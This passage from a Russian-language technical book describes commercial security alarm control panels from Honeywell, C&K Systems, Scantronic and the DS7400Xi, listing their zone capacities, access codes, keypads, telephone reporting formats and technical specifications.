Потребляемая мощность (1 станция) не более, Вт............................. 1150

Время передачи сигнала не более, с.................................................... 0, 5

Рис. 2.53. Вариант использования системы САКС-2М:

Изображение: 

2.3.3. Система охранной сигнализации Intelliguard 9000.

2. 3. 3. Система охранной сигнализации Intelliguard 9000

Система охранной сигнализации Intelliguard 9000 фирмы Honeywell (США) разрабатывалась с единственной целью — удовлетворить потребности в охране учреждений максимально экономичным образом. Особенности системы:

> многофункциональная защита;

> охрана отдельных зон (до 8 зон);

> отдельные точки защиты (до 512 точек);

> доступ по коду (до 99 кодов);

> несколько центров управления (до 4 центров);

> локальное управление (до 8 клавиатур);

> независимые программируемые выходы (до 30 выходов).

Благодаря программному обеспечению, построенному по принципу зонального управления, Intelliguard 9000 подходит для любого типа помещений, вне зависимости от сложности структуры здания или расписаний.

Система поддерживает до восьми зон охраны, восьми локальных клавиатур управления, четырех командных центров управления, до 512 отдельных охранных точек, включая контакты дверей, кнопки тревоги и различные датчики, например датчики движения, температуры, ионизации и сейсмодатчики. При обнаружении тревоги система определяет зону, которая подверглась вмешательству. Скрупулезно выполненное программное обеспечение и надежность проверенных электронных компонентов делают эту систему уникальной. Гибкость является основным достоинством системы.

2-3-31.jpg

Рис. 2. 54. Пульт управления

2-3-32.jpg

Рис. 2. 55. Структурная схема системы Intelliguard 9000

Intelliguard 9000 может опознавать до 100 пользователей, идентифицируя их по коду доступа. Более того, каждый пользователь имеет персональный код, который он может изменять в любое время без предварительного предупреждения.

Охрана отдельных зон позволяет защищаться от внутренних и сторонних нарушений. В системе предусмотрена возможность брать под охрану и снимать с охраны до восьми различных зон здания независимо друг от друга, что позволяет осуществлять доступ в одну зону, в то время как остальные будут оставаться под охраной. Пульт управления системы представлен на рис. 2. 54. Любая зона охраны может быть связана с другой так, что охрана ее автоматически отключится при разрешении доступа в последнюю.

Чтобы не допустить несанкционированного использования системы, каждый раз при ее включении необходимо ввести персональный код доступа (идентификатор и собственно код). Для зон повышенной безопасности может использоваться двойной код доступа. Возможно назначение до 100 отдельных кодов доступа.

Структурная схема системы Intelliguard 9000 приведена на рис. 2. 55.

К одной панели можно подключить до четырех центров управления, что позволяет осуществлять контроль за системой из нескольких различных мест. Регистратор событий автоматически запоминает все события и идентификаторы пользователей для обеспечения контроля за ними. Все события запоминаются с указанием даты и времени. В период охраны отдельные точки можно отключить, сохранив защиту остальных точек. Каждое неисправное устройство включается индивидуально. Система имеет функцию тестирования своего состояния.

Пользователь может задавать время прохода из центра управления системы. В зависимости от требований к охране и расположения помещений задается локальный или контролируемый режим работы. Внешние устройства звуковой сигнализации могут устанавливаться снаружи здания для оповещения о срабатывании системы.

Система Intelliguard 9000 имеет резервное питание, которое осуществляется от аккумуляторной батареи и включается в случае сбоев в сетевом питании. Заряд батарей и контроль за его уровнем осуществляется с помощью двухуровневого зарядного устройства.

Основные технические характеристики системы:

Размеры:

блок управления, см........................................................... 37х27х7, 5

центр управления, см........................................................... 25х14х9

Напряжение питания:

первичное (50 Гц), В..................................................................... 26

вторичное (постоянное), В............................................................. 12

аккумуляторная батарея, Ахч.......................................................... 7

Протокол коммуникации............................................................. RS-485

Диапазон рабочих температур, °С.................................................. 0—49

Влажность при температуре 30°С, %............................................... 5—95

Рис. 2.54. Пульт управления

Изображение: 

Рис. 2.55. Структурная схема системы Intelliguard 9000

Изображение: 

2.3.4. Охранные системы фирмы С&К Systems, Inc.

2. 3. 4. Охранные системы фирмы С&К Systems, Inc.

Фирма С&К Systems, Inc. (США) выпускает разнообразные системы охраны, выполненные с использованием последних достижений науки и техники.

Системы охраны включают в себя контрольные панели, клавиатуры, релейные блоки, источники питания, датчики движения и датчики битого стекла, сейсмодатчики, устройства передачи и приема данных по радиоканалу и телефонной линии. Более подробно рассмотрим несколько вариантов систем охраны С&К Systems.

Контрольные панели серии Securit 700L/703

Контрольные панели серии Securit 700L/703 — это удачный выбор для домашнего и коммерческого применения. Модель 700L предназначена для местных систем сигнализации. Модель 703 используется для местных систем сигнализации с 7 выходами контроля состояния системы. Внешний вид устройств показан на рис. 2. 56.

Особенности модели 700L

Семь проводных зон охраны: пять полностью программируемых, зона несанкционированного вмешательства и зона тревоги, включаемая с клавиатуры. Предварительное программирование функций зон не обязательно.

Программируемые функции зон. Каждая зона может быть запрограммирована на выполнение определенных функций: тревоги, прохода, тревоги или прохода в режиме частичной охраны, когда отключены только некоторые зоны, прохода в режиме полной охраны и прохода в режиме частичной охраны.

Компактная отдельная клавиатура. В системе может использоваться одновременно до трех клавиатур. Каждая клавиатура имеет откидную крышку, открывающую доступ к инструкции по управлению и клавишам с подсветкой.

2-3-41.jpg

Рис. 2. 56. Контрольные панели Securit 700L/703

Регулируемые временные задержки. Длительность времени доступа при входе/выходе программируется в интервале от 10 до 90 с. Время перехода в режим охраны из режима частичной охраны программируется в интервале от О до 90 с в зависимости от конкретных условий.

Запоминание 20 режимов, сохраняющихся в энергонезависимой памяти.

Режим охраны включает в себя режимы частичной и полной охраны, обеспечивающих удобство применения системы.

Два 4-разрядных кода для управления системой: код управления и код пользователя.

Особенности модели 703

Семь полностью программируемых зон, зона несанкционированного вмешательства и зона тревоги, включаемая с клавиатуры. Предварительное программирование функций зон не обязательно.

Компактная отдельная клавиатура (одновременно до 6 клавиатур на систему). Откидная крышка корпуса клавиатуры открывает доступ к инструкции по управлению и клавишам с подсветкой.

Программирование каждой зоны на выполнение одной из функций: тревоги, проход в режиме частичной и полной охраны, возможность использования дополнительных зон круглосуточной и пожарной охраны.

Регулируемые временные задержки входа/выхода программируются на время от 10 до 90 с. Задержка реагирования системы при проходе может программироваться на время от 0 до 90 с. Перевод системы в режим охраны может производиться по факту закрывания двери.

Запоминание 20 режимов, сохраняющихся при полном отключении питания и дополнительно 500 событий с протоколированием на бумаге с помощью принтера (в последнем случае необходима дополнительная оперативная память).

Семь электронных выходов контроля состояния системы предназначены для передачи информации о следующих событиях: нажатие кнопки включения тревоги, постановка/снятие с охраны, неисправность, программирование, разрешение доступа, несанкционированный доступ.

Четыре цифровых кода для управления системой: код управления и 3 кода пользователя, а также один 4-разрядный код включения режима охраны.

Повышенная информативность шлейфов с двумя оконечными резисторами. По одной паре проводов передаются два сигнала (тревоги и вмешательства).

Основные технические характеристики контрольных панелей Securit 700L/703'.

Типы шлейфов:

700L................................................................ нормально замкнутые

703................................................. с двумя оконечными резисторами

Основной источник питания, В.......................................................... 220

Резервный источник питания (7 Ахч), В.............................................. 12

Выход для подключения сирены (500 мА), В....................................... 12

Габаритные размеры, мм....................................................... 267х262х83

Вес, кг............................................................................................. 2, 7

Контрольные панели серии Securit 724/764

Контрольные панели Securit 724/764 предназначены для расширения зон охраны до 24 и 64 соответственно. Состав оборудования панелей показан на рис. 2. 57.

Основные характеристики контрольных панелей Securit 724/764'. > 8 программируемых шлейфов с двумя оконечными резисторами (подключаются к панели);

> расширение зон охраны до 24/64;

2-3-42.jpg

Рис. 2. 57. Состав серии Securit 724/764

> пульт управления с жидкокристаллическим дисплеем (до 16);

> число кодов пользователей до 16/32;

> - различие полномочий, защита от подбора кода;

> дистанционное программирование:

— программное деление на две индивидуально управляемые подсистемы, каждую из которых можно разделить на четыре независимых блока;

— 2 программируемых выхода сирены (12В, 500 мА);.

— 4 программируемых транзисторных выхода (12 В, 100 мА);

— до 32 программируемых релейных выходов;

> режим полной или два режима частичной охраны;

> память на 250/500 событий;

> порт RS-232 для подключения принтера, персонального компьютера и

других устройств;

> пакеты программ:

— дистанционного программирования;

— дистанционного контроля и управления;

— организации сети из 12 систем.

Структурная схема системы представлена на рис. 2. 58. Система не требует предварительного программирования и поддерживает все основные форматы передачи сообщений по телефонной линии.

При использовании системы возможно применение устройства набора кода EDS-18P, которое может находиться вне охраняемого помещения или внутри него.

В первом случае пользователь путем ввода персонального кода снимает (ставит) помещение с охраны, при этом контрольная панель фиксирует время снятия

2-3-43.jpg

Рис. 2. 58. Структура систем Securit 724/764

(постановки). Проникновение в помещение без ввода кода, пропадание питания или попытка вмешательства в охранную аппаратуру мгновенно вызывает срабатывание системы, при этом контрольная панель фиксирует время события.

Во втором случае используется модуль задержки, который включается в шлейф с мгновенной реакцией, что позволяет получить шлейф с задержкой тревоги. Извещатели включаются как в шлейф с мгновенной реакцией, так и в шлейф с задержкой тревоги. Пользователь открывает дверь и входит в помещение, при этом запускается модуль задержки тревоги. За время задержки пользователь должен ввести персональный код и снять помещение с охраны, при этом контрольная панель фиксирует время снятия. Если за отведенное время пользователь не ввел верный код, подается сигнал тревоги. Уходя, пользователь набирает персональный код и ставит помещение на охрану, при этом, спустя время задержки прохода, контрольная панель фиксирует время постановки. Пропадание питания или попытка вмешательства в охранную аппаратуру мгновенно вызывает срабатывание системы.

В любом из рассмотренных выше вариантов за работой системы осуществляется контроль сотрудниками охраны. Охранник может просматривать на жидкокристаллическом дисплее клавиатуры соответствующей контрольной панели номера шлейфов и названия помещений, поставленных на охрану. Они будут автоматически поочередно индицироваться на дисплее прибора. При тревоге включится сирена и на дисплее клавиатуры появится номер шлейфа и название помещения, в котором произошла тревога. Кроме того, охранник, обладающий соответствующим кодом, может просматривать содержимое памяти контрольной панели. Она имеет емкость на 500 событий и сохраняет следующую информацию:

> номер или название помещения и шлейфа;

> событие (снято/поставлено/тревога), которое произошло;

> дата и время регистрации события.

Эту информацию можно выводить в реальном масштабе времени на принтер или на дисплей персонального компьютера.

Система находит промышленное и коммерческое применение. Путем применения программного обеспечения Net Work XII имеется возможность организации системы на 24, 64, вплоть до 768 зон контроля.

Базовая конфигурация систем охранной сигнализации System 23xx

Системы моделей 236, 238, 2316 предлагают широкий спектр контрольных панелей для применения как в жилых домах, так и в коммерческих и промышленных помещениях. Все основные стандарты передачи информации имеют программную поддержку, что позволяет обеспечить раздельную, двукратную или резервную передачу информации по каналам связи. Панели обеспечивают контроль от 6 до 16 зон, имеют прекрасный современный дизайн. Возможно использование телевизионных систем и беспроводных радиошлейфов.

2-3-44.jpg

Рис. 2. 59. Структурная схема базовой системы System 23xx

Структурная схема базовой системы представлена на рис. 2. 59. Более подробно рассмотрим упомянутые выше (236, 238, 2316) системы и их составные части.

Шестизоновые контрольные панели System 236/2361 с устройством связи

Контрольная панель System 236/236i — это удачное решение для домашнего и коммерческого применения. Современный дизайн (рис. 2. 60), удобство и простота в использовании, высокая надежность, цифровое устройство связи — это далеко не все преимущества данной системы. Цифровое устройство связи панели 236i адаптировано для работы с отечественными телефонными линиями, в отличие от устройства связи панели 236, рассчитанного на напряжение телефонной линии 48 В.

2-3-45.jpg

Рис. 2. 60. Клавиатуры контрольных панелей System 236/2361

При использовании системы может применяться пакет программ дистанционного программирования Commander II, работающий в среде Microsoft Windows.

Особенности системы:

> шесть полностью программируемых зон и зона тревоги, включаемая с клавиатуры;

> два типа устройств для набора кода: со светодиодной и алфавитно-цифровой индикацией;

> дистанционное программирование в течение нескольких минут;

> регулируемые временные задержки входа/выхода;

> сообщения о состоянии контролируемых зон;

> 6 четырехзначных кодов с независимыми уровнями приоритетов.

Система не требует обязательного предварительного программирования и поддерживает все основные форматы передачи сообщений по телефонной линии. Программирование может быть выполнено в течение нескольких минут, что позволяет повысить надежность и удовлетворить требования большинства пользователей. Каждая охранная зона программируется для выполнения определенных функций: входа/выхода, входа/выхода с двойной задержкой, немедленной реакции, зоны прохода. Предусмотрены пожарные зоны, зоны принуждения (кнопка тревоги), круглосуточной охраны, несанкционированного вмешательства, неисправности. Задержка входа программируется на время от 10 до 300 с, а задержка выхода — от 10 до 150 с.

Система выводит на панель клавиатуры сообщения о состоянии контролируемых зон: нарушение, неисправность, исключение зоны из охраны, восстановление зоны, а также сообщения о пользователях системы (прерывание пользователем тревоги, снятие с охраны, постановка на охрану) и о состоянии системы

(отключение переменного напряжения, разряд аккумуляторной батареи, ошибка при дозвоне, переустановка системы, завершение программирования, перегорание предохранителя).

В системе используются 6 четырехзначных кодов пользователей с независимыми уровнями приоритетов. Коды устанавливаются администратором (он же первый пользователь). Шестизначный код установщика при монтаже системы позволяет программировать систему, но не может быть использован для постановки и снятия объекта с охраны.

Программируемый способ доступа к системе по телефонной линии исключает возможность несанкционированного доступа и позволяет игнорировать сигналы телефонных автоответчиков. Даже полное отключение питания не вызывает восстановления первоначального кода установщика.

Система позволяет использовать два типа клавиатур: светодиодную и алфавитно-цифровую с 32-символьным жидкокристаллическим дисплеем для системных сообщений. Выносные клавиатуры имеют современный дизайн.

Светодиодная клавиатура представлена двумя моделями: 236 Ledp и 236-2 Led. Это две привлекательные низкопрофильные клавиатуры с внутренней подсветкой. Они обеспечивают раздельную светодиодную индикацию для каждой зоны и индикацию состояния системы. Клавиатуры закрываются декоративной крышкой и имеют мягкий, нейтральный цвет, который сочетается практически с любым интерьером и текстурой стены. Клавиатуры потребляют ток до 40 мА. К системе можно подключить до 4 таких клавиатур.

Алфавитно-цифровая клавиатура Alpha Р имеет жидкокристаллический дисплей с внутренней подсветкой, отображающий до 32 символов системных сообщений. Сообщения могут выводиться на английском, испанском, французском, итальянском, немецком, португальском, венгерском, чешском, польском или голландском языках. Клавиатура потребляет ток 64 мА. К системе может быть подключено до 4 клавиатур Alpha Р.

Цифровое устройство связи по телефонной линии позволяет производить набор и автодозвон по трем 18-значным телефонным номерам. Два номера используются для передачи сообщений о состоянии системы и событиях, третий предназначен для дистанционного программирования. Набор номера может осуществляться как тоновым, так и импульсным способом. Система обеспечивает передачу двойных, раздельных и резервных сообщений. Двойное сообщение передается по обоим телефонным номерам, по одному номеру либо по одному с использованием второго, как резервного. Для дистанционного программирования и приема сообщений от контрольных панелей по телефонной линии используется пакет программ Monitor II, работающий в среде Microsoft Windows. Это позволяет осуществлять доступ к базе данных емкостью до 900000 номеров, содержащей планы охраняемых помещений и сведения о пользователях. Пакет программ Monitor удобен для организации централизованных постов наблюдения.

Основные технические характеристики системы:

Напряжение питания, В............................................................. 220/16

Потребляемая мощность, Вт............................................................... 25

Аккумуляторная батарея (6, 5 Ахч), В................................................. 12

Форматы приема информации:

Fast «А», Гц............................................................................. 2300

Slow «В», Гц............................................................................ 1400

Sum Check, Гц.......................................................................... 1400

Sum Check, Гц.......................................................................... 2300

AdemcoDTMF, Гц................................................................... 1400

Форматы сообщений:

3/1................................................................................... Extended

4/2.................................................................... CFSK III, SumCheck

Габаритные размеры, MM..................................................... 267х262х74

Масса, кг......................................................................................... 2, 1

Дополнительно система комплектуется герметичной аккумуляторной батареей типа 1265 с напряжением+ 12 В и емкостью 6, 5 ASч, телефонным проводом типа 9. Х PC/F с 8-штырьковым разъемом, блоком управления системой при помощи ключа типа 2310 KEY, выходным модулем для управления внешними устройствами типа 2300 DVR, замком Panel Lock с ключом для закрывания корпуса контрольной панели, датчиками открывания корпуса и снятия со стены типа Tamper Kit.

Восьмизоновые контрольные панели System 238/238i с устройством связи

Система 238i — это многоцветная экономичная контрольная панель фирмы С&К. Программирование системы может производиться с центральной станции управления или при помощи пульта управления на месте, что значительно упрощает монтаж и наладку системы. Внешний вид клавиатур контрольных панелей System 238/238i показан на рис. 2. 61.

2-3-46.jpg

Рис. 2. 61. Клавиатуры контрольных панелей System 238/238i

Особенности системы следующие.

Восемь полностью программируемых зон, включая одну специальную зону для детекторов с питанием по шлейфу, три зоны подачи сигнала тревоги с клавиатуры.

Передача сообщений по телефонной линии. Система поддерживает все основные форматы передачи сообщений по телефонной линии. Она совместима с автоответчиком. Передача происходит по одному или нескольким запрограммированным телефонным номерам. Может использоваться двукратная, раздельная или резервная передача информации.

Разнообразие стандартов передачи. В системе используется форматирование информации по стандартам: Fast «A» 2300 Гц; Slow «В» 1400 Гц; SumCheck 1400 Гц; SumCheck 2300 Гц; Ademco DYMF 1400 Гц; CFSK III. Форматы сообщений: 3/1 Extended; 4/2 CFSK III, SumCheck, 4+ 2 Ademco. Система обеспечивает защиту от неправильных и неполных соединений и специальную защиту от «пиратства».

Восемь кодов пользователей, состоящие от двух до пяти цифр с независимыми уровнями приоритетов. Коды устанавливаются хозяином или администратором (он же первый пользователь). Предусмотрена возможность использования кода «гостя» (временный код с длительностью действия до 15 дней).

Регулируемые временные задержки входа/выхода. Имеется возможность регулирования задержки входа и выхода на время от 10 до 300 с.

Сообщения системы:

> о состоянии контролируемых зон: нарушение, неисправность, исключение зоны из охраны, восстановление зоны;

> о пользователях системы: прерывание пользователем тревоги, снятие и постановка на охрану;

> о состоянии системы: отключение переменного напряжения, разряд аккумуляторной батареи, ошибка при дозвоне, переустановка системы, завершение программирования, перегорание предохранителя.

Совместно с системой используются два типа клавиатуры. Светодиодная клавиатура 238 Led Р привлекательна, имеет небольшие клавиши с внутренней подсветкой, обеспечивает раздельную светодиодную индикацию для каждой зоны и индикацию состояния системы. Она потребляет ток до 40 мА. К системе подключаются до 4 клавиатур Led Р.

Клавиатура типа Alpha Р с аналого-цифровым жидкокристаллическим дисплеем и внутренней подсветкой позволяет отобразить до 32 символов. Сообщения могут выводиться на десяти языках. Клавиатура потребляет ток до 64 мА. К системе можно подключить до 4 клавиатур Alpha Р.

Система содержит специальную защиту от «пиратства», которая защищает систему от несанкционированного проникновения в нее и от самовольного перепрограммирования при отключении питания.

Типичная система наблюдения, которая показана на рис. 2. 62, использует основные стандарты передачи информации по обычной телефонной сети, связывающей систему с персональным компьютером.

2-3-47.jpg

Рис. 2. 62. Вариант централизованной системы наблюдения с контрольной панелью System 238

Основные технические характеристики панелей System 238/238i:

Напряжение питания, В........................................................... 220 /16, 5

Потребляемая мощность, Вт............................................................... 25

Аккумуляторная батарея (6, 5 Ахч), В................................................. 12

Выход сирены:

напряжение, В...................................................................... 9, 5—14

ток, А.......................................................................................... 1, 5

Потребляемый ток в режиме покоя, мА.............................................. 100

Потребляемый ток во режиме набора, мА........................................... 120

Время реагирования (программируется), мс.................................. 5 — 750

Габаритные размеры:

модель 238, мм................................................................. 267х262х74

модель 238i, мм................................................................ 313х268х79

Масса:

модель 238, кг.............................................................................. 2, 1

модель 238i, кг............................................................................. 2, 5

Для дистанционного программирования с помощью персонального компьютера используется программное обеспечение Commander II. Для слежения за состоянием системы и дистанционного программирования используется программное обеспечение Monitor II. Имеется устройство для защиты программного обеспечения.

Рис. 2.56. Контрольные панели Securit 700L/703

Изображение: 

Рис. 2.57. Состав серии Securit 724/764

Изображение: 

Рис. 2.58. Структура систем Securit 724/764

Изображение: 

Рис. 2.59. Структурная схема базовой системы System 23xx

Изображение: 

Рис. 2.60. Клавиатуры контрольных панелей System 236/2361

Изображение: 

Рис. 2.61. Клавиатуры контрольных панелей System 238/238i

Изображение: 

Рис. 2.62. Вариант централизованной системы наблюдения с контрольной панелью System 238

Изображение: 

2.3.5. Охранные панели и системы фирмы Scantronic.

2.3.5. Охранные панели и системы фирмы Scantronic

Фирма Scantronic International Ltd. является одной из ведущих компаний в мире быстро растущей охранной промышленности. Ее продукция отличается прекрасным дизайном, высокой степенью надежности и удобством в использовании. В состав производимой фирмой продукции входит целое семейство охранных систем и панелей, а также множество различных детекторов и интерфейсов. Рассмотрим некоторые из них.

Панели дистанционного управления серии 8ххх

Панели дистанционного управления серии 8ххх — это одно из последних достижений фирмы Scantronic. В состав системы входят пульт управления, панель управления, клавиатура, детектор системы индивидуальной идентификации с датчиками и интерфейсами (рис. 2. 63).

2-3-51.jpg

Рис. 2. 63. Панели управления фирмы Scantronic

Панель управления 840i

Панель управления модели 840i обеспечивает контроль восьми программируемых зон. Имеется возможность расширения числа этих зон до 16 с помощью 8-зоновой сменной платы расширения ПКК №943 или до 40 зон с помощью 32-зоновой одношлейфовой платы №941

Полный 32-символьный текст, выводимый на дисплее клавиатуры, включает описание пользователей, номера зон и другую служебную информацию.

Систему характеризует простота установки режимов охраны путем ввода соответствующего кода с клавиатуры. Панель управления имеет встроенные устройства дистанционного управления и модем для передачи сообщений через телефонную сеть, а также дистанционный загрузчик для программирования, распознавания и дистанционного контроля состояния системы. Имеется возможность датирования до 400 событий и регистрации времени их свершения (визуальная, с распечаткой на принтере и с записью в памяти). Панель совместима с цифровыми коммуникаторами №8400, 8440, интерфейсом 9056 и имеет 4 выхода на реле и 32 выхода на детекторы. Она позволяет проводить разделение на 4 системы с возможностью создания подсистем. В панели используются клавиатуры 4-х типов (32 символа, большие клавиши, жидкокристаллический дисплей). Панель совместима со всеми устройствами системы индивидуальной идентификации (СИИ) данной серии.

Панель управления 8136i

Панель обеспечивает восемь программируемых зон охраны, предусмотрена возможность расширения до 16 зон с помощью 8-зоновой сменной платы расширения №943 или до 400 зон с помощью 32-зоновой платы расширения, или до 136 зон с помощью 4-х шлейфовой 128-зоновой платы расширения №142.

Панель позволяет производить датирование 500 событий и регистрацию времени их свершения (визуальная, с распечаткой на принтере и с записью в память). Панель имеет 4 выхода на реле и 228 выходов на детекторы.

Панели серии 8ххх используют в своем составе клавиатуры следующих моделей:

> 925 — традиционный стиль Remus, 32 символа, жидкокристаллический (Ж К) дисплей;

> 926 — современный дизайн, 32 символа, ЖК дисплей;

> 928 — терминал, оснащенный светодиодной индикацией;

> 929 — 8 символьный дисплей с подсветкой изнутри;

> 930 — большие клавиши, 32 символа, ЖК дисплей.

Системы Series 8ххх имеют в своем составе 32-зоновую систему индивидуальной идентификации (СИИ), которая разработана фирмой Scantronic и предназначена для работы с панелями серии Series 8ххх типа 840i и 8136i. Основой системы является уникальная микросхема с программным управлением, обеспечивающая соединение всех зон с помощью стандартного 3-х жильного кабеля. Допускается организация последовательного опроса и звездообразная конфи-

2-3-52.jpg

Рис. 2. 64. Устройства системы индивидуальной идентификации

гурация цепи. Оконечные устройства системы могут быть выполнены на основе СВЧ и инфракрасных детекторов. Некоторые типы этих устройств представлены на рис. 2. 64.

Для соединения различных приборов СИИ используются специально разработанные интерфейсы. Внешний вид одного из них представлен на рис. 2. 65. Характеристики интерфейсов:

> 901 — одноточечный проводной универсальный модуль интерфейса для использования с датчиками, выпускаемыми фирмой Scantronic. Каждый прибор имеет программируемый выход на слаботочное реле или на другое токовое устройство.

2-3-53.jpg

Рис. 2. 65 Внешний вид интерфейса для соединения различных СИИ

> 902 — одноточечный проводной модуль с 6-контактным разъемом для работы с датчиком любого типа.

> 903 — закрытый интерфейс с одним двухполюсным входом зоны и изолирующими питающими проводами (240 В/50 Гц) для переключения программируемого выхода на реле.

> 904 — закрытый интерфейс с одним двухполюсным входом зоны и низковольтное переключение программируемого выхода на реле (2 А/24 В).

> 905 — закрытый интерфейс типа IDISLIM с пятью двухполюсными входами зоны и пятью выходами типа «открытый коллектор» с программным управлением (предельно допустимый ток 0, 1 А на каждом выходе, напряжение+ 12 В)

> 906 — модуль звукового сигнализатора IDISSBS для работы в качестве внешнего устройства звуковой сигнализации вместо существующего стандартного блока SAB/SCB.

Система безопасности Scantronic 750

Устройство Scantronic 750 представляет собой контроллер-коммутатор на базе микропроцессора с полным набором функций систем охраны, совместимый со всеми используемыми форматами приемных устройств (рис. 2. 66).

Система идеальна для установки в домашних условиях и на предприятиях среднего и малого бизнеса, когда требования к характеристикам, гибкости и надежности максимальны.

Характеристики контрольной панели:

> загрузка с персонального компьютера;

> 6 зон, программируемых на звуковую или незвуковую сигнализацию тревоги, звуковую сигнализацию пожара и моментального сигнала вторжения с задержкой или со слежением;

> быстрый отклик на воздействие последовательно от каждой зоны;

2-3-54.jpg

рис.2.66 Система безопасности SP750

> выводы на СИД (светодиодный индикаторный дисплей) с использовани ем шины данных и синхронизирующих импульсов;

> - программирование задержки входа/выхода на время от 10 до 150 с;

> индикация тревоги звуковым сигналом;

> работа с резервной батареей гелиевого типа емкостью от 4 до 7 Ахч и напряжением+ 12 В;

> системное ПЗУ с электрическим стиранием защищает коды пользователя

во время молнии и перебоях напряжения сети. Характеристики модема:

> резервный телефонный номер, который может быть использован для вы дачи команд открыть/закрыть;

> импульсный и тоновый набор телефонного номера;

> обнаружение тонового набора;

> стандартный формат сообщений;

> автоматическое вхождение в связь (1400/230 Гц);

> программирование задержки сообщения на время от 10 до 150 с;

> сообщение о пропадании (перебоях) сетевого питания;

> программирование числа попыток набора от 1 до 15;

> сообщение о неисправности пожарной сигнализации;

> 3—4 цифровых учетных номера;

> линия захвата с двухполюсным переключателем на два направления;

> восстановление сообщений по зонам. Характеристики клавиатуры:

> 5 зон, управляемых с клавиатуры, круглосуточные зоны тревоги (с сооб щениями или без);

> индикация неисправностей;

> пожарная индикация по зонам;

> блокировка зон при установке, включая зону круглосуточной охраны;

> широкоугольный СИД;

> максимум 4 клавиатуры на систему;

> звуковая сигнализация при условиях близких к тревоге или повреждению;

> 5 кодов доступа с возможностью их изменения пользователем;

> программирование функций системы с клавиатуры.

Каждый блок укомплектован трансформатором переменного тока и одной выносной 4-х проводной клавиатурой привлекательного дизайна, которая также выполняет функцию программатора. Имеется возможность переключения режима работы при использовании 6-й зоны. Линии данных и синхронизирующих импульсов использованы в качестве выходов на СИД при работе переключателя. Устройство программируется заводом-изготовителем для проверки сразу же после доставки и монтажа.

Система безопасности Scantronic Avenger 9000

-Система безопасности Scantronic Avenger 9000 (AV9000) представляет собой 8-зоновое устройство с цифровым модемом (рис. 2.67). Устройство может быть запрограммировано с помощью клавиатуры либо с IBM PC-совместимого компьютера, используя программу Scan Pro DownLoad. Эта программа обеспечивает работу в режиме дистанционного управления и выдает информацию о состоянии системы.

TEM1.jpg

Рис. 2. 67. Система AV9000

Система AV9000 пригодна для установки в домашних условиях, а также для использования на предприятиях малого бизнеса. Особенности системы:

> до восьми управляемых зон;

> часы реального времени;

> запоминание состояния тревоги;

> до 8 кодов пользователя с возможностью их открытия/закрытия пользователем;

> автоматический таймер начала контроля состояния системы;

> два способа программирования: с клавиатуры или загрузка с помощью программы Scan;

> встроенная схема шунтирования детектора звонка;

> встроенный цифровой коммуникатор.

Система содержит плату вывода данных, которая представляет собой восемь программно-управляемых выходов. На основную панель управления поступают следующие сигналы управления: взлома, пожара, сигнал готовности, дистанционный зуммер, выход на световую сигнализацию. Функции цифрового коммуникатора:

> раздельные сообщения на учетные номера;

> сообщение о срабатывании зоны;

> программа начальной загрузки;

> задержка сообщений о срабатывании по зонам;

> сигнализация тревоги, повреждения, запоминание сообщений по зонам;

> тональный или импульсный набор;

> сообщение времени события;

> дистанционное отключение пользователей;

> возможность программирования с помощью IBM PC-совместимого ком пьютера.

Сообщения коммуникатора передаются в стандартных форматах импульсных сообщений, включая Extended, Ademco Highsperd, Scantronic ScanPro и Scantronic (Acron) Superfast.

Система оснащена прекрасной по дизайну и своим функциональным возможностям клавиатурой. Функции пользователя, контролируемые с клавиатуры, состоят в следующем: оснастка/переоснастка, индивидуальная или групповая блокировка зон, 4 аварийных функции, сброс детектора табачного дыма, функция звонка, установка времени и даты, установка задержки времени входа/выхода, системный тест.

Модель AV9000F размещается в стальном корпусе вместе с источником питания и клавиатурой типа EKP1LED или EKP1LLCD, дополнительно имеется клавиша блокировки.

Модель AV9000 может быть использована для охраны двух независимых объектов, определяемых как сектора, с зонами, установленными изготовителем. Каждый сектор соответствует четырем зонам, четырем пользователям, одному времени прохода и двум клавиатурам, что делает систему идеальной для установки в домашних условиях.

Программа управления системы позволяет реализовать следующие характеристики управления:

> модификацию зон;

> сообщение открыть/закрыть;

> формирование тестового сообщения для проверки связи по одному из трех телефонных номеров;

> блокировка сигнала ложной тревоги;

> конфиденциальность.

Контрольная панель Classic 6

Современный внешний вид панели, встроенная клавиатура, более простые интерфейсы, чем у других панелей, — все это делает контрольную панель Classic 6 удобной для использования при охране квартир, офисов, складов, магазинов и других объектов малого и среднего бизнеса (рис. 2. 68).

Панель отвечает всем необходимым требованиям безопасности и удобна в использовании.

TEM2.jpg

Рис. 2. 68. Контрольная панель Classic 6

Основные характеристики панели Classic 6:

> 6 полностью программируемых зон;

> 10 кодов программирования (8 кодов пользователей, технический код, код принуждения);

> встроенная клавиатура с возможностью программирования энергонеза висимого ПЗУ;

> интерфейс на дистанционную клавиатуру (до 2-х клавиатур модели 9425);

> выход на внутреннее звуковое реле с 2-мя дополнительными программи руемыми выходами;

> встроенный громкоговоритель с регулятором громкости;

> программируемое энергонезависимое ПЗУ;

> регистрация 15 событий;

> стандартные выходы на коммуникатор;

> дополнительный расширитель для выходов отдельных зон;

> работа со слаботочными устройствами.

Панель управления модели 9448

Эта модель во многом схожа с рассмотренным выше устройством (рис. 2. 69). Выполняя те же функции, модель 9448 имеет следующие особенности:

> 5 зон охраны;

> встроенная клавиатура;

> встроенный и внешний громкоговоритель сопротивлением 16 Ом;

> выбор полной или частичной установки;

> программируемый маршрут прохода;

> вспомогательный источник питания на 300 мА.

TEM3.jpg

Рис. 2. 69 Панель управления модели 9448

Рис. 2.63. Панели управления фирмы Scantronic

Изображение: 

Рис. 2.64. Устройства системы индивидуальной идентификации

Изображение: 

Рис. 2.65 Внешний вид интерфейса для соединения различных СИИ

Изображение: 

Рис. 2.67. Система AV9000

Изображение: 

Рис. 2.68. Контрольная панель Classic 6

Изображение: 

Рис. 2.69 Панель управления модели 9448

Изображение: 

рис.2.66 Система безопасности SP750

Изображение: 

2.3.6. Универсальная программно-контрольная охранно-пожарная панель DS7400Xi с мультиплексной шиной.

2.3.6. Универсальная программно-контрольная охранно-пожарная панель DS7400Xi с мультиплексной шиной

Панель DS7400Xi — это устройство, обеспечивающее охрану и пожарную безопасность помещений. Она имеет встроенный модем, подключаемый к двум телефонным линиям. Возможно подключение до 8 клавиатур и взаимодействие с компьютером через стандартный интерфейс RS-232. Основные характеристики:

> 8 базовых зон с расширением до 16 при 2-х проводной системе подключения извещателей;

> расширение до 128 зон при 4-х проводной схеме подключения извещателей;

> возможность программирования пожарных шлейфов с подтверждением тревоги;

> логическое деление на 4 подсистемы;

> до 36 программируемых релейных выходов;

> 2 базовых программируемых выхода типа «открытый коллектор» (12 В/1 А и 12 В/500 мА);

